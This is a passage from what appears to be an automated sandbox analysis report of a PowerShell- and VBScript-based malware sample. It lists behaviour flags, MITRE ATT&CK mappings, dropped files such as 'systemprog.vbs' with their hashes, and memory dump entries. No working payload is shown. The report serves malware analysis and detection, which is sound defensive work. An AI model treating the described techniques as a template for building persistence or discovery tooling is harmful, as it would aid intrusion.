'D D1D' ) );};"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4932

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PoWERSHelL.EXe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
104B

MD5
34b5e0c2bbf49f792601f0476377cdad

SHA1
613fc06d99c9a9ca1983202dd746ac5ebe132e75

SHA256
2854e0671134a82669f9eb83c77d565b4490f25946e3075d4069c94a2b94982b

SHA512
d0011ec46eff9df95ab4198b805e680cfaaf4457a9bc2facceb6d19abb9adac6eed1d9272b3888c5d690a61f654cb200ea25dcd5dcd1c07822238561267f71d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
1756062f5473e6b955b41ddce03a9245

SHA1
12832ed46a57970c4a4b3ffd020c4702de9615c7

SHA256
7834149c552f8f75f9a912fd719512ecf2d14c8e085d2f9cc40172afe89d680b

SHA512
41f1ad9659933afecc36bcfa07b7e0c989cb9b621ad688336f9fbb5487c8bd9816acd73cf8522a1f6daddce933520420c95d0cce6bcda94aac1c8732dfb55f14

Download Submit
C:\Users\Admin\AppData\Local\Temp\32u5r4sr\32u5r4sr.dll

Filesize
3KB

MD5
3538752823d81685c0c06014995d1143

SHA1
a857402c7b271e6c77603500e2e1504783527c42

SHA256
6ae10556bdee41527778d2f5b53f8f98047dc7f391ba05c16d60937865a2f236

SHA512
76ce6f9bce024a44a96b95d4e484eb1fac7a56d24721a63481a416736a10357cd5c2d2149d3819b683df2323d269349e54768dcac1599915b0de88d40851c239

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9BB3.tmp

Filesize
1KB

MD5
89f469678a9d5a44c8974cd9e4ec46a6

SHA1
88f7ad84388de0c002a0c25a20a8cc319278fb22

SHA256
311647aeda2a963a065f084a6d6c3248686a34bf601ce64738eb349f7d945f1f

SHA512
31c85c82a067fc24b0eb3c5c9ecc96d6ea25652e77638fb8a0cb7b22ab6e242c873017d1fcff654e8b14ae5fd83bb1ab19e195d865c119c108da712b42dd6fb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1oe0k2mp.bk0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\systemprog.vbs

Filesize
505KB

MD5
a4ee7f410034e89c289380a88d4ad213

SHA1
087ef53831a212bf202d55881c8979b9c332d668

SHA256
c0af2b280f089a3a9c2756f4eb1a609f460524b8763d9c805f33088292b41e7a

SHA512
3c2307fe7ba966733707233d688b70c16a5919b4de89818089d3aa037945f902826e9d78d2afc4a0d7de2ba670e1446f1db6c4404636280df19cd63208db992d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\32u5r4sr\32u5r4sr.0.cs

Filesize
474B

MD5
206b59e0d2478462db34639668ee6d35

SHA1
47706fd84dc37e6ff0d0911e3ae7a478c5200ba2

SHA256
cc8d67fed72bb9127905170bb1cf75144e9bf89f22b044be6fdc673609563f4e

SHA512
a5bdd3e1e920b322c63b5b596ff6cb33c1473cc26efa5da3c30959d5f6fdeafa77d7a448064a5163014fd198da32bf784c5305c059b56863c0b5d35de1b6a698

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\32u5r4sr\32u5r4sr.cmdline

Filesize
369B

MD5
611697a29a19a10392b8d0311bfb9a0c

SHA1
90b59333e8e47290a27222cf5f7453dfda362f00

SHA256
3e148f5d786edc0823cc3322f6cfaf43e0e055f60ab8f341a317054f598a4ccf

SHA512
7ee8a140bc641dc8000299997662680e6fe42c3f00fdaafb1b82c6a313af726cb36a6aeafed9708cf532c5b29e47d749f0f671e3bfbbd43571f1fff3f9b09637

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\32u5r4sr\CSC44760F551A4448F4903D67DFB4E25E0.TMP

Filesize
652B

MD5
a24b590a30b6ca31f3038a9703a47b72

SHA1
954e092f84e09d843f49a8ab9fd0b5c2413636e0

SHA256
66d0e5e34893e9d3797f1203ff8982992ebfbca76e4c9a7cf3665ad9e573946d

SHA512
2763785ed7e3e363c4b4e738e4b0b8cd72103b3eac8b440013728697bd44fe683f6a9f931a0d38483dcc0111ba9d4a1dee55b1abd8e260bf24ce80d73d579437

Download Submit
memory/1384-65-0x00000000067D0000-0x00000000067D8000-memory.dmp

Filesize
32KB

Download
memory/1384-72-0x00000000710C0000-0x0000000071870000-memory.dmp

Filesize
7.7MB

Download
memory/1384-1-0x0000000004C70000-0x0000000004CA6000-memory.dmp

Filesize
216KB

Download
memory/1384-81-0x00000000710C0000-0x0000000071870000-memory.dmp

Filesize
7.7MB

Download
memory/1384-2-0x00000000710C0000-0x0000000071870000-memory.dmp

Filesize
7.7MB

Download
memory/1384-3-0x0000000005490000-0x0000000005AB8000-memory.dmp

Filesize
6.2MB

Download
memory/1384-4-0x00000000710C0000-0x0000000071870000-memory.dmp

Filesize
7.7MB

Download
memory/1384-74-0x0000000008690000-0x0000000008C34000-memory.dmp

Filesize
5.6MB

Download
memory/1384-73-0x0000000007600000-0x0000000007622000-memory.dmp

Filesize
136KB

Download
memory/1384-19-0x00000000062B0000-0x00000000062FC000-memory.dmp

Filesize
304KB

Download
memory/1384-71-0x00000000710CE000-0x00000000710CF000-memory.dmp

Filesize
4KB

Download
memory/1384-0-0x00000000710CE000-0x00000000710CF000-memory.dmp

Filesize
4KB

Download
memory/1384-7-0x0000000005BA0000-0x0000000005C06000-memory.dmp

Filesize
408KB

Download
memory/1384-6-0x0000000005B30000-0x0000000005B96000-memory.dmp

Filesize
408KB

Download
memory/1384-5-0x0000000005260000-0x0000000005282000-memory.dmp

Filesize
136KB

Download
memory/1384-18-0x0000000006210000-0x000000000622E000-memory.dmp

Filesize
120KB

Download
memory/1384-17-0x0000000005C10000-0x0000000005F64000-memory.dmp

Filesize
3.3MB

Download
memory/3432-44-0x0000000006E20000-0x0000000006E2A000-memory.dmp

Filesize
40KB

Download
memory/3432-50-0x0000000007040000-0x0000000007048000-memory.dmp

Filesize
32KB

Download
memory/3432-48-0x0000000007000000-0x0000000007014000-memory.dmp

Filesize
80KB

Download
memory/3432-47-0x0000000006FF0000-0x0000000006FFE000-memory.dmp

Filesize
56KB

Download
memory/3432-46-0x0000000006FC0000-0x0000000006FD1000-memory.dmp

Filesize
68KB

Download
memory/3432-45-0x0000000007050000-0x00000000070E6000-memory.dmp

Filesize
600KB

Download
memory/3432-49-0x0000000007110000-0x000000000712A000-memory.dmp

Filesize
104KB

Download
memory/3432-43-0x0000000006DC0000-0x0000000006DDA000-memory.dmp

Filesize
104KB

Download
memory/3432-30-0x000000006D980000-0x000000006D9CC000-memory.dmp

Filesize
304KB

Download
memory/3432-41-0x0000000006C70000-0x0000000006D13000-memory.dmp

Filesize
652KB

Download
memory/3432-42-0x0000000007400000-0x0000000007A7A000-memory.dmp

Filesize
6.5MB

Download
memory/3432-40-0x0000000006C10000-0x0000000006C2E000-memory.dmp

Filesize
120KB

Download
memory/3432-29-0x0000000006C30000-0x0000000006C62000-memory.dmp

Filesize
200KB

Download
memory/4400-91-0x0000000005F60000-0x00000000062B4000-memory.dmp

Filesize
3.3MB

Download